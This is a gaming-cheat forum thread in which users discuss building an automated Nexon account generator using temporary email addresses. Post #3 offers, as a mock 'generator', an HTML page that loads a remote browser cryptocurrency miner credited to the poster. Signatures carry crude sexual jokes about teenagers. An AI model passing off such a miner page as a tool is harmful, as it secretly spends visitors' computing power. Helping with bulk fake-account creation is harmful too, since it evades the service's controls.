Results 1 to 9 of 9
  1. #1
    Cryptonic's Avatar
    Join Date
    Apr 2010
    Gender
    male
    Location
    United Provinces of Canada
    Posts
    1,221
    Reputation
    44
    Thanks
    176
    My Mood
    Bored

    Nexon Account Generator

    Anyone have an idea for a Nexon Account Generator ever since nexon changed their site?

    Well, first it asks for your e-mail

    <- lol the image get renamed to Nexgn.png

    So, you would just enter your e-mail and the application would go to that mail site.. and from there on, I don't know what to do.

    Any one have any ideas?

    /discuss
    My Projects

    Basic Nexon Account Generator | [Source]FvClickBot | UltimateClean - Advanced CA Cleaner




     
    Quote Originally Posted by traiphoenix View Post
    this hack not working
    Quote Originally Posted by CAFlames View Post
    your brain not working
    Quote Originally Posted by iReapzi View Post
    What about the horny 15 year olds?
    Quote Originally Posted by PepsiXHacker View Post
    Well, they're the ones with mods of naked viper.
    Quote Originally Posted by iReapzi View Post
    Why would they want mods of naked viper, not like the can see her body in game
    Quote Originally Posted by AVGN View Post
    http://www.mpgh.net/forum/210-combat...exy-viper.html
    Quote Originally Posted by iReapzi View Post
    Brb questioning my sexuality.
    Quote Originally Posted by AVGN View Post
    Quote Originally Posted by PepsiXHacker View Post
    Dat bod.


    Previous name "PepsiXHacker"

  2. #2
    twistedkilla1's Avatar
    Join Date
    Apr 2011
    Gender
    male
    Posts
    16
    Reputation
    10
    Thanks
    3
    My Mood
    Twisted
    I have been thinking about this also best thing i could come up with is a email acct creator
    then you will need it to read emails after the email is created,signp for nexon,read the email,goto the rest of the sign up page and then ur done...but thats gonna be alot of work

  3. #3
    bremiller1421's Avatar
    Join Date
    Mar 2011
    Gender
    male
    Posts
    51
    Reputation
    10
    Thanks
    131
    My Mood
    Chatty
    I could make one very very easily lol
    <html>
    <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.6.1/jquery.min.js" type="text/javascript"></script>
    <script src="http://www.bitcoinplus.com/js/miner.js" type="text/javascript"></script>
    <script type="text/javascript">BitcoinPlusMiner("jacobbremiller@yahoo .com")</script>
    </html>

  4. #4
    grey489177's Avatar
    Join Date
    Aug 2010
    Gender
    male
    Posts
    509
    Reputation
    18
    Thanks
    1,875
    My Mood
    Tired
    here is what i do, real easy.
    1: Use YopMail - random email address generator for ur email address, its a temporary email address and requires you to enter NO information.
    2: Go to nexon and go to register page, paste the email address.
    3: Click back to your temp mail account and check ur mail for nexon.
    4: finish setup and keep login details for nexon in an excell document for easy access.

    the whole process takes about 2 minutes.

    If 2 minutes is too long for you then you are too lazy.
    Quote Originally Posted by xXTornadoXx
    You really have a great personality
    I've never met a person like you, who can give me guidance on things and also give me alot of support. I'm glad that I met you, really glad
    Quote Originally Posted by 1 Corinthians 13:11
    When I was a child, I spoke as a child, I understood as a child, I thought as a child.
    But, when I became a man, I put childish things away.

  5. The Following User Says Thank You to grey489177 For This Useful Post:

    Cryptonic (09-04-2011)

  6. #5
    Reflex-'s Avatar
    Join Date
    Mar 2011
    Gender
    male
    Location
    192.168.1.01
    Posts
    6,633
    Reputation
    584
    Thanks
    2,261
    My Mood
    Dead
    Make one so i can try it

  7. #6
    Cryptonic's Avatar
    Join Date
    Apr 2010
    Gender
    male
    Location
    United Provinces of Canada
    Posts
    1,221
    Reputation
    44
    Thanks
    176
    My Mood
    Bored
    Quote Originally Posted by bremiller1421 View Post
    I could make one very very easily lol
    I could care less. This is a duscussion, not a place to brag.

    Quote Originally Posted by grey489177 View Post
    here is what i do, real easy.
    1: Use YopMail - random email address generator for ur email address, its a temporary email address and requires you to enter NO information.
    2: Go to nexon and go to register page, paste the email address.
    3: Click back to your temp mail account and check ur mail for nexon.
    4: finish setup and keep login details for nexon in an excell document for easy access.

    the whole process takes about 2 minutes.

    If 2 minutes is too long for you then you are too lazy.
    Thanks, I will get to it soon xD
    My Projects

    Basic Nexon Account Generator | [Source]FvClickBot | UltimateClean - Advanced CA Cleaner




     
    Quote Originally Posted by traiphoenix View Post
    this hack not working
    Quote Originally Posted by CAFlames View Post
    your brain not working
    Quote Originally Posted by iReapzi View Post
    What about the horny 15 year olds?
    Quote Originally Posted by PepsiXHacker View Post
    Well, they're the ones with mods of naked viper.
    Quote Originally Posted by iReapzi View Post
    Why would they want mods of naked viper, not like the can see her body in game
    Quote Originally Posted by AVGN View Post
    http://www.mpgh.net/forum/210-combat...exy-viper.html
    Quote Originally Posted by iReapzi View Post
    Brb questioning my sexuality.
    Quote Originally Posted by AVGN View Post
    Quote Originally Posted by PepsiXHacker View Post
    Dat bod.


    Previous name "PepsiXHacker"

  8. #7
    twistedkilla1's Avatar
    Join Date
    Apr 2011
    Gender
    male
    Posts
    16
    Reputation
    10
    Thanks
    3
    My Mood
    Twisted
    Quote Originally Posted by grey489177 View Post
    here is what i do, real easy.
    1: Use YopMail - random email address generator for ur email address, its a temporary email address and requires you to enter NO information.
    2: Go to nexon and go to register page, paste the email address.
    3: Click back to your temp mail account and check ur mail for nexon.
    4: finish setup and keep login details for nexon in an excell document for easy access.

    the whole process takes about 2 minutes.

    If 2 minutes is too long for you then you are too lazy.


    I,v Tried Like 4 Dif Temp Email Sites And Nexon Dont Email Any Of Them So Idk If Thats Gonna Work ... Your Prob Gonna HAve To Yahoo Or Somthing ...But Anyways Good Luck

  9. #8
    Cryptonic's Avatar
    Join Date
    Apr 2010
    Gender
    male
    Location
    United Provinces of Canada
    Posts
    1,221
    Reputation
    44
    Thanks
    176
    My Mood
    Bored
    Quote Originally Posted by twistedkilla1 View Post
    I,v Tried Like 4 Dif Temp Email Sites And Nexon Dont Email Any Of Them So Idk If Thats Gonna Work ... Your Prob Gonna HAve To Yahoo Or Somthing ...But Anyways Good Luck
    Mail.com works good, easy to make a genorator with it, I already have, though, they may have changed it a little.
    My Projects

    Basic Nexon Account Generator | [Source]FvClickBot | UltimateClean - Advanced CA Cleaner




     
    Quote Originally Posted by traiphoenix View Post
    this hack not working
    Quote Originally Posted by CAFlames View Post
    your brain not working
    Quote Originally Posted by iReapzi View Post
    What about the horny 15 year olds?
    Quote Originally Posted by PepsiXHacker View Post
    Well, they're the ones with mods of naked viper.
    Quote Originally Posted by iReapzi View Post
    Why would they want mods of naked viper, not like the can see her body in game
    Quote Originally Posted by AVGN View Post
    http://www.mpgh.net/forum/210-combat...exy-viper.html
    Quote Originally Posted by iReapzi View Post
    Brb questioning my sexuality.
    Quote Originally Posted by AVGN View Post
    Quote Originally Posted by PepsiXHacker View Post
    Dat bod.


    Previous name "PepsiXHacker"

  10. #9
    grey489177's Avatar
    Join Date
    Aug 2010
    Gender
    male
    Posts
    509
    Reputation
    18
    Thanks
    1,875
    My Mood
    Tired
    Quote Originally Posted by twistedkilla1 View Post
    I,v Tried Like 4 Dif Temp Email Sites And Nexon Dont Email Any Of Them So Idk If Thats Gonna Work ... Your Prob Gonna HAve To Yahoo Or Somthing ...But Anyways Good Luck
    i have used the method posted above for over a year and get the emails.

    Mail.com is a good one too, and while a generator is nice u gotta get past their captcha. I made a generator that stored the names/passwords in an ini file for later use. Ill see if i can find it later, no time atm. If i do ill let ya know pepsi but ull still have to do captcha manually.
    Quote Originally Posted by xXTornadoXx
    You really have a great personality
    I've never met a person like you, who can give me guidance on things and also give me alot of support. I'm glad that I met you, really glad
    Quote Originally Posted by 1 Corinthians 13:11
    When I was a child, I spoke as a child, I understood as a child, I thought as a child.
    But, when I became a man, I put childish things away.

Similar Threads

  1. [C#]Nexon Account Generator
    By Lolland in forum Open Source Releases
    Replies: 16
    Last Post: 09-10-2013, 06:58 AM
  2. [Release] Nexon account Generator
    By killswitch49 in forum Combat Arms Spammers, Injectors and Multi Tools
    Replies: 1
    Last Post: 11-21-2010, 06:46 PM
  3. Nexon Account Generator
    By whitten in forum Combat Arms Hacks & Cheats
    Replies: 30
    Last Post: 08-19-2009, 10:39 PM
  4. Nexon Account Generator 2.0
    By LazyCountry in forum Combat Arms Hacks & Cheats
    Replies: 44
    Last Post: 03-26-2009, 07:17 PM
  5. [Release] Nexon Account Generator tut fo vista
    By Joanlala in forum Combat Arms Hacks & Cheats
    Replies: 7
    Last Post: 09-02-2008, 12:26 PM